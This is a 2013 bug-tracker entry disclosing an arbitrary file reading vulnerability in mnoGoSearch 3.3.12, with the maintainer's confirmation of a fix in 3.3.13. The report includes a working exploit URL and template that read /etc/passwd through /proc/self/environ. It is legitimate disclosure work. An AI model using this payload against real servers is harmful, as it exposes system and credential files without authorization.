Search Site          
 
Home  

 

Status:
Bugs of Type:
Last Comment By:
With text: in the email or report
Full Statistics

Edit bug number:
 


Bug#4818

Status:ClosedUser Modify   Dev Modify
From:ymaryshev [ at ] ptsecurity [ dot ] ru
Date:2013-02-15 17:44:20
Type:Other problems
OS:
Version:3.3.12
Database type:
DBMode:
Assigned To:
Short Desc.:Arbitrary Files Reading in mnoGoSearch

[2013-02-15 17:44:20] ymaryshev at ptsecurity.ru
Positive Technologies experts have detected an 
Arbitrary Files Reading vulnerability in 
mnoGoSearch.

Passing startup parameters via QUERY_STRING 
(http://tools.ietf.org/html/draft-robinson-www-
interface-00#section-7) for an application running 
in CGI mode can be used to set page template path 
variable "d". Generating a template file on the 
server and specifying it in the variable "d" can 
result in Arbitrary Files Reading via <!INCLUDE 
CONTENT="URI"> template structure.  
---[ Exploitation example]
The /proc/self/environ file, in which part of the 
template is formed through the PATH_INFO 
environment variable, can be used as a template.
<!--top-->
<!INCLUDE CONTENT="file:/etc/passwd">
<!--/top-->

http://host/cgi-bin/search.cgi/%0A%3C!--top--
%3E%0A%3C!INCLUDE%20CONTENT=%22file:/etc/passwd%22
%3E%0A%3C!--/top--%3E?-d/proc/self/environ

---[ Solution ]	

Startup parameters overriding via QUERY_STRING 
must be prevented.

---[Credits]

Vulnerability was detected by Sergey Bobrov, 
Positive Research Center (Positive Technologies 
Company)
[2013-02-25 12:55:50] bar at mnogosearch.org
Thanks for reporting!

This bug has been fixed in mnogosearch-3.3.13,
which will be released soon.

searcg.cgi now ignored command line options (including -d)
when running under HTTPD.
[2013-02-25 12:56:15] bar at mnogosearch.org
Typo:

s/ignored/ignores
[2013-03-01 00:26:46] bar at mnogosearch.org
mnogosearch-3.3.13 is available from the site now.



Copyright © 2000-2013 Lavtech.Com Corp.